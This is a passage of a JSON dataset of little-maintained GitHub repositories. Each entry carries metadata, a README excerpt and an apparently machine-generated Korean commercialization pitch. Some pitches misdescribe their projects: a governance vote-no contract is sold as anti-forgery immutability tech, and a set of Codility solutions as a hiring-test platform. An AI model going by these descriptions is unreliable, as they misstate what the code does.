User](#add-admin-user)\n    + [Add *public* Group and Repository](#add-public)\n    + [Add Security Layers](#add-secur","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"iptop/babel-plugin-proposal-pattern-matching","github_url":"https://github.com/iptop/babel-plugin-proposal-pattern-matching","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":46,"description":"# babel-plugin-proposal-pattern-matching 분석\n\n## 왜 보물인가\n프로그래밍 언어의 복잡한 조건 처리를 더 간단하고 읽기 쉽게 만드는 도구로, 개발자의 생산성을 크게 향상시킬 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 도구 SaaS**\n- 웹 기반 코드 편집기나 IDE에 패턴 매칭 기능을 통합하여 구독","readme_excerpt":"![avatar](./doc/img/logo.png)\n\n[中文文档](./doc/zn-ch/readme.md)\n\n## Installation\n\nWith npm:\n```sh\nnpm install --save-dev babel-plugin-proposal-pattern-matching\n```\n\n## Setup\n\n### .babelrc\n\n```json\n{\n  \"plugins\": [\"babel-plugin-proposal-pattern-matching\"]\n}\n```\n\n## Example\n\n### easy\n```js\nimport match from 'babel-plugin-proposal-pattern-matching/match'\nconst fib = n=>match(n)(\n        (v=1)=>1,\n        (v=2)=>1,\n        _=>fib(_-1)+fib(_-2)\n)\n\nconsole.log(fib(10))\n// -> 55\n```\n\n### fnmatch\n```js\nimport match from 'babel-plugin-proposal-pattern-matching/match'\nconst fib = fnmatch(\n  (v = 1) => 1,\n  (v = 2) => 1,\n  _ => fib(_ - 1) + fib(_ - 2)\n)\n\nconsole.log(fib(10))\n\n// -> 55\n\nconst arr = [1, 2, 3]\n\nconsole.log(\n  arr.map(\n    fnmatch(\n      (v = 1) => 'one',\n      (v = 2) => 'two',\n      (v = 3) => 'three'\n    )\n  )\n)\n\n// -> [ 'one', 'two', 'three' ]\n\n```\n\n### type\n```js\nimport { match , T} from 'babel-plugin-proposal-pattern-matching/match'\n\nconst getType = item => match(item)(\n  (v = T.n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"erlanamanatov/RateItCompose","github_url":"https://github.com/erlanamanatov/RateItCompose","stars":10,"language":"Kotlin","license":"unknown","abandonment_months":55,"description":"# RateItCompose 상용화 분석\n\n## 왜 보물인가\n사용자가 별점과 리뷰를 남길 수 있는 평가 기능을 앱에 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 배달앱, 숙박 예약 서비스, 온라인 쇼핑몰 등이 자체 평가 시스템을 구축할 때 사용\n2. **내부 업무 도구**: 기업의 직원 평가 시스템, 회의실 ","readme_excerpt":"# RateIt Compose\n\n## :scroll: Description\nA little app that was built with [Jetpack Compose](https://developer.android.com/jetpack/compose).  It contains only one screen with custom animated content.\n\nThe goal of the app is to explore [Animation API](https://developer.android.com/jetpack/compose/animation) and [Canvas API](https://developer.android.com/reference/kotlin/androidx/compose/ui/graphics/Canvas) of Jetpack Compose.\n\nInspired by [this repository](https://github.com/Cuberto/rate-it).\n\n## :camera_flash: Screenshots\n<img src=\"/screenshots/gif_24.gif\" width=\"260\">\n\n<img src=\"/screenshots/r1.png\" width=\"260\">&emsp;<img src=\"/screenshots/r2.png\" width=\"260\">&emsp;<img src=\"/screenshots/r3.png\" width=\"260\">\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"mariotacke/advent-of-code-2019","github_url":"https://github.com/mariotacke/advent-of-code-2019","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# Advent of Code 2019 솔루션 저장소 분석\n\n## 왜 보물인가\n매년 수천 명이 참여하는 프로그래밍 문제 풀이 대회의 완성된 솔루션 모음으로, 초보자부터 고급자까지 학습하고 검증할 수 있는 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 플랫폼**: 프로그래밍 초보자를 위한 단계별 문제 풀이 과정을 제공하고, 사용자가","readme_excerpt":"# Advent of Code 2019 - My Solutions\n[![Build Status](https://github.com/mariotacke/advent-of-code-2019/workflows/build/badge.svg)](https://github.com/mariotacke/advent-of-code-2019/actions)\n[![Completion Status](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/mariotacke/advent-of-code-2019/master/.github/badges/completion.json)](https://github.com/mariotacke/advent-of-code-2019)\n![Libraries.io dependency status for GitHub repo](https://img.shields.io/librariesio/github/mariotacke/advent-of-code-2019)\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/mariotacke/advent-of-code-2019/master/LICENSE)\n\nSanta has become stranded at the edge of the Solar System while delivering presents to other planets! To accurately calculate his position in space, safely align his warp drive, and return to Earth in time to save Christmas, he needs you to bring him measurements from **fifty stars**.\n\nCollect stars by solving puzzle","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"hajali-amine/cheat-sheets","github_url":"https://github.com/hajali-amine/cheat-sheets","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":60,"description":"# Cheat-Sheets 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우거나 일할 때 자주 잊어버리는 명령어와 문법을 한눈에 볼 수 있는 요약본 모음집입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자용 온라인 학습 플랫폼에서 유료 구독으로 정리된 치트시트(요약 가이드) 판매\n- **내부 업무 도구**: 회사의 프로그래머들이 공통으로","readme_excerpt":"# Who doesn't love cheat sheets?\n\nThis repository will behold all of my cheat sheets in the future!\n\nAt the moment, you will find:\n\n## Languages\n\n* [Prolog](languages/prolog/readme.md)\n\n## Data Structures\n\n* [Heap](data_structures/heap/readme.md)\n* [B-Tree](/data_structures/b_tree/readme.md)\n\n## Have fun! ","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"despawnerer/scooby","github_url":"https://github.com/despawnerer/scooby","stars":8,"language":"Rust","license":"unknown","abandonment_months":33,"description":"# Scooby 저장소 분석\n\n## 왜 보물인가\n프로젝트의 설명이 없고 최근 커밋이 2023년 9월로 1년 이상 업데이트되지 않아, 현재 활발히 유지되는 프로젝트인지 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n저장소 이름과 기본 정보만으로는 구체적인 활용 사례를 파악하기 어렵습니다. 프로젝트의 코드와 README 문서를 확인한 후에 SaaS, 내부 도","readme_excerpt":"Scooby\n======\n\n[![Latest Version](https://img.shields.io/crates/v/scooby.svg)](https://crates.io/crates/scooby)\n[![docs](https://docs.rs/scooby/badge.svg)](https://docs.rs/scooby)\n\nAn SQL query builder with a pleasant fluent API closely imitating actual SQL. Meant to comfortably build dynamic statements with a little bit of safety checks sprinkled on top to ensure you don't forget important things like `ON` clauses. Does not do quoting, does not do validation.\n\nSupports only PostgreSQL syntax at the moment.\n\nRequires Rust 1.54.\n\nConsult [documentation](https://docs.rs/scooby) for details and examples.\n\nPrinciples\n----------\n\n- Single responsibility: _builds SQL statements_. Everything else is out of scope.\n- API designed to look _as close to actual SQL as possible_, while being a tiny bit more flexible.\n- Everything is _raw SQL strings_. If you need to pass user input, please use parametrized statements.\n- Obvious _mistakes should be prevented at compile time_, where possible.\n- No ext","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"Ashish2030/Codility-Platform-Solution","github_url":"https://github.com/Ashish2030/Codility-Platform-Solution","stars":8,"language":"Java","license":"MIT","abandonment_months":61,"description":"# Codility-Platform-Solution 분석 보고서\n\n## 왜 보물인가\n프로그래밍 실력을 평가하고 채용 과정에서 개발자를 선별하는 **코딩 테스트 플랫폼의 완성된 솔루션**을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 HR팀이 개발자 채용 시험을 자동으로 진행하고 점수를 채점해주는 웹 서비스로 운영\n2. **내","readme_excerpt":"","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"lxb320124/WebButton","github_url":"https://github.com/lxb320124/WebButton","stars":7,"language":"PowerBuilder","license":"unknown","abandonment_months":58,"description":"# WebButton 저장소 분석\n\n## 왜 보물인가\n웹사이트에 간단한 버튼 기능을 추가하고 싶어 하는 개발자들을 위해 이미 만들어진 코드를 제공하므로, 처음부터 다시 만들 필요 없이 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 업무 도구들이 표준화된 버튼 컴포넌트를 구독형으로 제공하여 일관성 있는 사용자 ","readme_excerpt":"PowerBuilder development framework\n![登录界面1](https://user-images.githubusercontent.com/89757391/131768902-9bd926e2-55ca-45fb-b900-ec713287f118.png)\n![主程序界面1](https://user-images.githubusercontent.com/89757391/131768914-d779586e-a020-4e80-80f6-4c1c30a91673.png)\n![主程序界面2](https://user-images.githubusercontent.com/89757391/131768922-998fdcb7-78b9-4f62-ada6-4da9f30e8873.png)\n![主程序界面5](https://user-images.githubusercontent.com/89757391/131768946-ca4e37e1-ded8-44e2-9b91-8aa1bf8ed314.png)\n![主程序界面3](https://user-images.githubusercontent.com/89757391/131768955-a3751100-0203-4999-b34d-442a63b012fb.png)\n![主程序界面4](https://user-images.githubusercontent.com/89757391/131768957-f5a7c432-6c71-416e-857b-67ffe6f7c4fd.png)\n\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"khaosdoctor/event-sourcing-javascript","github_url":"https://github.com/khaosdoctor/event-sourcing-javascript","stars":6,"language":"","license":"MIT","abandonment_months":58,"description":"# event-sourcing-javascript 상용화 분석\n\n## 왜 보물인가\n애플리케이션의 모든 변화 내역을 기록하고 추적할 수 있어, 금융·의료·감시 시스템처럼 투명성과 신뢰가 중요한 분야에서 강력한 경쟁력을 갖춥니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회계·감시 기능이 필요한 협업 툴(변경 이력 자동 추적, 감사 보고서 자동 ","readme_excerpt":"# JavaScript With Event Sourcing\n\n> A JavaScript event sourcing example from scratch\n\n## Branches\n\n- `basic`: Basic implementation of a simple event sourced domain model\n- `complex`: A more complex example of a ship manager API using event sourcing and [Tardis](https://github.com/irontitan/tardis)\n\nSwitch to the desired branch and start exploring.\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"grasilife/glue","github_url":"https://github.com/grasilife/glue","stars":6,"language":"Vue","license":"MIT","abandonment_months":40,"description":"# grasilife/glue 상용화 분석\n\n## 왜 보물인가\n서로 다른 여러 시스템들을 연결해주는 접착제 역할을 하는 기술로, 회사들이 자신의 업무 도구들을 쉽게 통합하도록 도와줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 회사들이 회계 프로그램, 이메일, 메신저 등을 자동으로 연결하는 통합 플랫폼\n2. **내부 업무 ","readme_excerpt":"<p align=\"center\">\n    <img alt=\"logo\" src=\"https://grasilife.github.io/material/logo.svg\" width=\"120\" style=\"margin-bottom: 10px;\">\n</p>\n\n<h1 align=\"center\">Glue</h1>\n\n<p align=\"center\">可能是中国第一个如此完善的移动端web components组件库</p>\n\n### 介绍\n\nGlue是一个基于web components构建的组件库,可以在react,vue2,vue3,angular和html等任何前端框架中,真正做到了一个组件库多框架运行\n\n## 特性\n\n- 提供 60 多个高质量组件，覆盖移动端各类场景\n- 性能极佳\n- 单元测试覆盖率 90%+，提供稳定性保障\n- 完善的中英文文档和示例\n- 支持全平台\n- 支持按需引入\n- 支持主题定制\n- 支持 TypeScript\n\n## 安装\n\n```bash\nnpm i glue-components -S\n```\n\n## 快速上手\n\n### vue中使用,参考[stencil的Vue中使用使用指南](<https://stenciljs.com/docs/vue/>)\n```js\nimport Vue from 'vue';\nimport App from './App.vue';\nimport \"glue-components/dist/glue-components/glue-components.css\";\nimport { applyPolyfills, defineCustomElements } from 'glue-components/loader';\n\nVue.config.productionTip = false;\n\n// Tell Vue to ignore all components defined in the glue-components\n// package. The regex assumes all components names are prefixed\n// 'test'\nVue.config.ignoredElements = [/test-\\w*/];\n\n// Bind th","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"soutoigor/vuedoro","github_url":"https://github.com/soutoigor/vuedoro","stars":7,"language":"Vue","license":"unknown","abandonment_months":61,"description":"# vuedoro 프로젝트 분석\n\n## 왜 보물인가\n포모도로 타이머(25분 집중 + 5분 휴식 반복 기법)를 간단한 웹앱으로 만들어, 누구나 쉽게 생산성을 높일 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 생산성 앱(시간 추적, 통계 대시보드, 팀 협업 기능 추가)으로 운영\n- **내부 업무 도구**: 회사 직","readme_excerpt":"# VueDoro ⏲️ 🍅\n\nImprove your focus while studying or working using the [Pomodoro Technique](https://en.wikipedia.org/wiki/Pomodoro_Technique#:~:text=The%20Pomodoro%20Technique%20is%20a,length%2C%20separated%20by%20short%20breaks.).\n\nStart using: https://vue-doro.netlify.app\n\n## Example\nhttps://user-images.githubusercontent.com/22479477/120112887-38d49d80-c14e-11eb-8f78-9ef569a7a290.mp4\n\n## Setup\nInstall the dependencies:\n```\nnpm install\n```\n\nCompiles and hot-reloads for development\n```\nnpm run serve\n```\n\nCompiles for production\n```\nnpm run build\n```\n\nRun Linter\n```\nnpm run lint\n```\n## Technologies\n- [VueJS](https://vuejs.org/)\n- [Stylus](https://www.stylus.com/)\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"daangn/advent-of-code-2021","github_url":"https://github.com/daangn/advent-of-code-2021","stars":9,"language":"OCaml","license":"MIT","abandonment_months":54,"description":"# daangn/advent-of-code-2021 평가\n\n## 왜 보물인가\n프로그래밍 실력을 체계적으로 평가하고 검증할 수 있는 표준화된 문제 풀이 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 역량 평가 SaaS**: 기업이 채용 과정에서 지원자의 코딩 실력을 객관적으로 측정하는 온라인 플랫폼\n2. **교육용 내부 도구**: IT 교육기관이나","readme_excerpt":"# Advent of Code 2021 \\w Karrot\n\n새로운 프로그래밍 언어와 함께하는 당근마켓 겨울나기\n\n## What is the AoC (Advent of Code)?\n\n[Advent of Code](https://adventofcode.com/2021/about)는 매년 12월 1일 부터 25일 까지 진행되는 온라인 이벤트입니다.\n\n매일 자정(EST/UTC-5 기준)에 하나의 프로그래밍 퍼즐이 공개되고, 정답을 제출하면 제출한 순서대로 1~100 점 사이의 점수를 받습니다. (가장 빨리 푼 사람이 100점, 그 다음부터 1점씩 떨어짐)\n\n## Rules\n\n풀이 속도와 점수에 연연하지 않고 언어 학습에 초점을 맞춰 함께하실 분들을 구합니다.\n\n- 언어 하나에 한 명, 선착순으로 참여합니다.\n- 아직 익숙하지 않은, 본인에게 새로운, 잘 알려지지 않지만 소개하고 싶은 언어를 선택합니다.\n- 한 사람이 여러 언어를 선택할 수 있지만, 가장 우선하는 언어를 선택해야합니다. 그 외 언어들은 희망자가 있다면 양보합니다.\n\n## How to\n\n1. 이 저장소를 Fork 합니다.\n2. [참가자](#entries) 섹션에 자기 정보를 추가하고 Pull Request 를 엽니다.\n3. 언어별 디렉토리를 만들고 해당 디렉토리에 문제 풀이를 위한 기본적인 환경설정을 미리 추가합니다.\n4. `README.md` 를 추가해주세요. 언어에 대한 간단한 소개와 테스트를 실행하는 방법을 포함해야합니다.\n5. 12월 1일 부터, [홈페이지](https://adventofcode.com/2021)에 문제가 공개될 때마다 문제를 풀고 Push 합니다.\n\n주의사항:\n\n- 다른 참가자/언어 디렉토리를 건드리지 말아주세요.\n- 문제의 입력 데이터나 정답 결과를 코드에 포함하지 말아주세요.\n  테스트는 제공되는 샘플 데이터를 사용하고, 정답은 직접 AoC 홈페이지에 제출하세요.\n- 가급적이면 컴포트존을 벗어나려고 애써봅시다.\n\n> “A language that doesn't affect t","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"smooth-code/react-flatten-children","github_url":"https://github.com/smooth-code/react-flatten-children","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":71,"description":"# react-flatten-children 분석 보고서\n\n## 왜 보물인가\n웹사이트 제작 도구에서 복잡한 구조의 콘텐츠를 간단하게 정렬할 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 페이지 빌더 서비스**: 드래그 앤 드롭으로 웹사이트를 만드는 서비스에서 사용자가 배치한 요소들을 자동으로 정렬\n2. **대시보드 설정 도구**: 회사","readme_excerpt":"# react-flatten-children\n\n[![License](https://img.shields.io/npm/l/react-flatten-children.svg)](https://github.com/gregberge/react-flatten-children/blob/master/LICENSE)\n[![npm package](https://img.shields.io/npm/v/react-flatten-children/latest.svg)](https://www.npmjs.com/package/react-flatten-children)\n[![Build Status](https://img.shields.io/travis/gregberge/react-flatten-children.svg)](https://travis-ci.org/gregberge/react-flatten-children)\n[![DevDependencies](https://img.shields.io/david/dev/gregberge/react-flatten-children.svg)](https://david-dm.org/gregberge/react-flatten-children?type=dev)\n\nReact utility to flatten fragments 🗜\n\n```sh\nnpm install react-flatten-children\n```\n\n## Example\n\n```js\nimport React from \"react\";\nimport { Switch as BaseSwitch } from \"react-router\";\nimport flattenChildren from \"react-flatten-children\";\nimport PublicHome from \"./PublicHome\";\nimport PrivateHome from \"./PrivateHome\";\nimport Account from \"./Account\";\nimport Login from \"./Login\";\n\n// Create a fragme","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"Jinxiansen/JPExport","github_url":"https://github.com/Jinxiansen/JPExport","stars":12,"language":"Objective-C","license":"MIT","abandonment_months":95,"description":"# JPExport 저장소 분석\n\n## 왜 보물인가\n일반인도 쉽게 사용할 수 있는 간단한 데이터 내보내기 도구로, 복잡한 기술 없이 정보를 원하는 형식으로 저장할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 회계/재무 관리 앱에서 고객이 자신의 거래 내역을 엑셀/PDF로 다운받을 수 있는 기능 제공\n- **내부 업무 도구**","readme_excerpt":"![](image/JPExport2.png)\n\n### JPExport 仅用于网络数据 responseObject 解析生成 property 。\n\nMac 版、Swift版待续…\n\n支持 NSArray、NSDictionary、NSString、NSNumber、BOOL  。\n\n# Screenshots\n\n![](image/export.gif)\n\n\n##### 示例如下：\n\n### 原始数据\n\n```\n\n{\n    errorcode = 2;\n    data = \n    {\n        age = 19;\n        sex = \"male\";\n        name = Jinxiansen;\n        blog = \"jinxiansen.com\";\n        course = \n        (\n            {\n                Chinese = 98;\n                \"Class_hour\" = 53;\n                population = \"1.5 billion\";\n            },\n            {\n                color = red;\n            },\n            {\n                English = 39;\n                \"class_6our\" = 48;\n                \"class_size\" = 40;\n                \"teacher_name\" = jobs;\n            }\n        );\n    };\n}\n\n```\n\n### 原始数据转换\n\n```\n\n/** English */\n@property (nonatomic, copy) NSString *English;\n/** class_size */\n@property (nonatomic, strong) NSNumber *class_size;\n/** teacher_name */\n@property (nonatomic, copy) NSString *teacher_name;\n/** class","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"miracthis/Hrms","github_url":"https://github.com/miracthis/Hrms","stars":7,"language":"CSS","license":"unknown","abandonment_months":58,"description":"# miracthis/Hrms 저장소 분석\n\n## 왜 보물인가\n회사 직원들의 급여, 근무 시간, 휴가를 한 곳에서 관리할 수 있는 시스템으로, 중소 기업의 인사 업무 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업을 대상으로 월 구독 형태의 클라우드 기반 인사관리 플랫폼으로 운영\n- **내부 업무 도구**:","readme_excerpt":"# Hrms\nHuman Resources Management System\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"transmissions11/immutability-but-worse","github_url":"https://github.com/transmissions11/immutability-but-worse","stars":16,"language":"Shell","license":"AGPL-3.0","abandonment_months":52,"description":"# transmissions11/immutability-but-worse 분석\n\n## 왜 보물인가\n데이터를 한 번 저장한 후 절대 변경할 수 없게 만드는 기술로, 금융거래나 기록 관리처럼 신뢰성이 중요한 분야에서 위조 방지 목적으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **전자계약 플랫폼**: 계약서 체결 후 내용이 바뀌지 않도록 보장하는 S","readme_excerpt":"# immutability-but-worse\n\nA simple contract users can delegate their governance tokens to that votes no on every proposal.\n\nCompatible with **OpenZeppelin** and **Compound** style governance systems.\n\n## Usage\n\nJust call `voteNo()` with the address of a governance contract and proposal ID, and we'll handle the rest!\n\n## Deployment\n\nhttps://etherscan.io/address/voteNo.eth\n\n## Getting Started\n\n```sh\ngit clone https://github.com/transmissions11/immutability-but-worse.git\ncd immutability-but-worse\nmake\n```\n","composite_score":0.5003,"license_safety_tag":"risky"},{"name":"hustvl/NeuSample","github_url":"https://github.com/hustvl/NeuSample","stars":11,"language":"Python","license":"Apache-2.0","abandonment_months":44,"description":"# NeuSample 사업화 분석\n\n## 왜 보물인가\n3D 이미지나 영상에서 필요한 부분만 똑똑하게 골라내는 AI 기술로, 게임·영화·의료 영상 분석 등 다양한 산업에서 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임·영화 제작 SaaS**\n3D 모델링 작업 시간을 50% 이상 단축하는 자동화 도구로 월 구독료 수익화\n\n*","readme_excerpt":"# NeuSample: Neural Sample Field\n\n### [Project Page](https://jaminfong.cn/neusample/) | [Paper](https://arxiv.org/abs/2111.15552)\n\n[NeuSample: Neural Sample Field for Efficient View Synthesis](https://arxiv.org/abs/2111.15552)   \n[Jiemin Fang](https://jaminfong.cn/)<sup>1</sup>, [Lingxi Xie](http://lingxixie.com/)<sup>2</sup>, [Xinggang Wang](https://xinggangw.info/)<sup>1</sup>, [Xiaopeng Zhang](https://sites.google.com/site/zxphistory/)<sup>2</sup>, [Wenyu Liu](http://eic.hust.edu.cn/professor/liuwenyu/)<sup>1</sup>, [Qi Tian](https://scholar.google.com/citations?hl=en&user=61b6eYkAAAAJ)<sup>2</sup>  \n<sup>1</sup> HUST, <sup>2</sup> Huawei Cloud\n\n-----------------------------\n![framework](./imgs/framework.jpg)\nNeural radiance fields (NeRF) have shown great potentials in representing 3D scenes and synthesizing novel views, but the computational overhead of NeRF at the inference stage is still heavy. To alleviate the burden, we delve into the coarse-to-fine, hierarchical sampling proce","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"TheSnowfield/OpenArcaeaArts","github_url":"https://github.com/TheSnowfield/OpenArcaeaArts","stars":10,"language":"","license":"NOASSERTION","abandonment_months":48,"description":"# OpenArcaeaArts 사업화 분석\n\n## 왜 보물인가\n음악 게임 'Arcaea'의 팬들이 직접 만든 창작 자료들을 모아놓은 커뮤니티 라이브러리로, 게임 팬덤 시장에서 수요가 확실한 콘텐츠 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **Arcaea 팬 커뮤니티 SaaS**: 사용자가 직접 악보, 차트, 커버곡을 업로드·공유·구매할 수 있는 유료 ","readme_excerpt":"# OpenArcaeaArts\r\n\r\nSelf made in-game GFX or SFX for anyone use without worry about Lowiro's ToS.\r\n\r\nYou can use it in:\r\n - Your frontend (including and not limited to websites, applications, forms)\r\n - Your bots (e.g. score layout design)\r\n - Arcaea simulators, or chart viewer\r\n - A copy of Arcaea\r\n - Any project without commercial\r\n\r\n# Showcase\r\n|      |      |      |      |      |\r\n| :--: | :--: | :--: | :--: | :--: |\r\n| air_input | arc_body | arc_body_hi | arc_cap | audio_bluetooth |\r\n| <image src=\"img/air_input.png\" height=50> | <image src=\"img/arc_body.png\" height=50> | <image src=\"img/arc_body_hi.png\" height=50> | <image src=\"img/arc_cap.png\" height=50> | <image src=\"./img/audio_bluetooth.png\" height=50> |\r\n| approach_arrow | grade_a | grade_b | grade_c | grade_d |\r\n| <image src= \"img/approach_arrow.png\" height=50> | <image src= \"img/grade_a.png\" height=50> | <image src= \"img/grade_b.png\" height=50> | <image src= \"img/grade_c.png\" height=50> | <image src= \"img/grade_d.png\" heigh","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"joshfinnie/rusty-react","github_url":"https://github.com/joshfinnie/rusty-react","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":38,"description":"# joshfinnie/rusty-react 상용화 분석\n\n## 왜 보물인가\n빠른 속도의 웹 개발 언어(Rust)와 사용자 인터페이스 라이브러리(React)를 결합한 프로젝트로, 웹사이트를 더 빠르고 안정적으로 만들 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 대시보드 SaaS 서비스**\n기업의 데이터를 시각화하고 분석하는 웹 대시보드 구독 ","readme_excerpt":"# Rusty React\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"watson/mode-s-decoder","github_url":"https://github.com/watson/mode-s-decoder","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# watson/mode-s-decoder 분석\n\n## 왜 보물인가\n항공기의 신호를 읽어내는 기술로, 항공 교통 추적 및 보안 분야에서 핵심 인프라 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **항공기 추적 SaaS**: 실시간 항공기 위치 정보를 제공하는 웹 서비스로 개발, 항공사나 공항에 구독료 청구\n- **내부 업무 도구**: 항공 보안 ","readme_excerpt":"# mode-s-decoder\n\nA library to decode a binary Mode S message to an easy to use JavaScript\nobject.\n\nMode S is an aviation transponder interrogation mode used by Secondary\nSurveillance Radar (SSR) and Automatic Dependent Surveillance-Broadcast\n(ADS-B) systems.\n\nFor an example of this module in use, see\n[AirplaneJS](https://github.com/watson/airplanejs).\n\n[![Build status](https://travis-ci.org/watson/mode-s-decoder.svg?branch=master)](https://travis-ci.org/watson/mode-s-decoder)\n[![js-standard-style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat)](https://github.com/feross/standard)\n\n## Installation\n\n```\nnpm install mode-s-decoder --save\n```\n\n## Usage\n\n```js\nconst Decoder = require('mode-s-decoder')\nconst decoder = new Decoder()\n\nconst data = new Uint8Array([0x8f, 0x46, 0x1f, 0x36, 0x60, 0x4d, 0x74, 0x82, 0xe4, 0x4d, 0x97, 0xbc, 0xd6, 0x4e])\nconst message = decoder.parse(data)\n\nconsole.log(message)\n```\n\n## API\n\n### `Decoder.UNIT_FEET`\n\nA constant indicatin","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"Kreijstal/star-me","github_url":"https://github.com/Kreijstal/star-me","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":103,"description":"# Kreijstal/star-me 보물 분석\n\n## 왜 보물인가\nGitHub에서 인기 있는 프로젝트를 자동으로 찾아주는 도구로, 개발자들이 배우고 참여할 만한 좋은 프로젝트를 손쉽게 발견할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 뉴스레터 플랫폼에서 매주 \"이 주의 주목할 프로젝트\" 섹션을 자동으로 생성\n2. **내","readme_excerpt":"# Star-Me\nStarring is fun!\n\n# Steps\n\n## 1. Sign In\nMake sure that you are signed in your GitHub account, if not do so now!\n\n## 2. Copy the Script\nOpen star.user.js [at this link here](https://github.com/fossasia/star-me/blob/master/star.user.js) and copy the entire script.\n\n## 3. Open Developer Tools in Your Browser\n### For Linux and Windows Users\nTo open developer tools on Chrome/Chromium please press <kbd>ctrl</kbd>+<kbd>shift</kbd>+<kbd>I</kbd>\n\n### For macOS Users using Chrome/Chromium\nTo open developer tools please press <kbd>⌘</kbd>+<kbd>⌥</kbd>+<kbd>I</kbd>\n\n\n### It should look something like this:\n\n![This is the image where the developer tools should be but for some reason or another it is not displayed :(](./docs/chrome-dev-tools.png)\n\n## 4. Open the Console tab in the Developer Tools\nClick on the `Console` tab in the developer tools to open it, then click on the text area in the Console tab.\n\n## 5. Paste the Script\nPaste the script by pressing <kbd>ctrl</kbd>+<kbd>V</kbd> if ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"westoncb/under-game","github_url":"https://github.com/westoncb/under-game","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# under-game 저장소 분석\n\n## 왜 보물인가\n간단한 게임 개발 엔진으로, 누구나 쉽게 게임을 만들고 공유할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 게임 개발 플랫폼으로, 사용자가 브라우저에서 직접 게임을 만들고 판매\n- **내부 업무 도구**: 기업 교육이나 게임화된 직원 교육 프로그램의 기반 도구\n","readme_excerpt":"# Under\n\n[![run on repl.it](http://repl.it/badge/github/westoncb/under-game)](https://repl.it/github/westoncb/under-game)\n\nUnder is a minimal game written in JavaScript and GLSL with procedural graphics produced mostly by noise, signed distance functions, and [boolean/space-folding operators](http://mercury.sexy/hg_sdf/) applied to those functions. The codebase is small and fairly well-documented.\n\n- [Play here!](http://symbolflux.com/under) (Make sure to play in landscape orientation on mobile!)\n- [Youtube video](https://youtu.be/Q010AFPItqY)\n\n**Controls**: Press up to go up, otherwise you'll go down. Skim the cave edge for more points—but don't run into it!\n\n![](readme-media/screen.png)\n![](readme-media/anim.gif)\n\n## Contents\n- [Project Background](#project-background)\n- [Code Overview](#code-overview)\n- [Build/Run](#build-and-run)\n\n## Project Background\nI recently wrapped up a contract and had some free time on my hands, so I decided to make something 80% for fun. The other 20% was ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"kaggledatasets/kaggledatasets","github_url":"https://github.com/kaggledatasets/kaggledatasets","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":78,"description":"# kaggledatasets 저장소 분석\n\n## 왜 보물인가\n캐글(Kaggle)의 공개 데이터들을 손쉽게 다운로드하고 관리할 수 있도록 만든 도구로, 데이터 분석이 필요한 누구나 필요한 정보를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼에서 사용자들이 다양한 공개 데이터셋에 원클릭으로 접근할 수 ","readme_excerpt":"# kaggledatasets\n\nCollection of Kaggle Datasets ready to use for Everyone\n\n![License](https://img.shields.io/github/license/kaggledatasets/kaggledatasets) 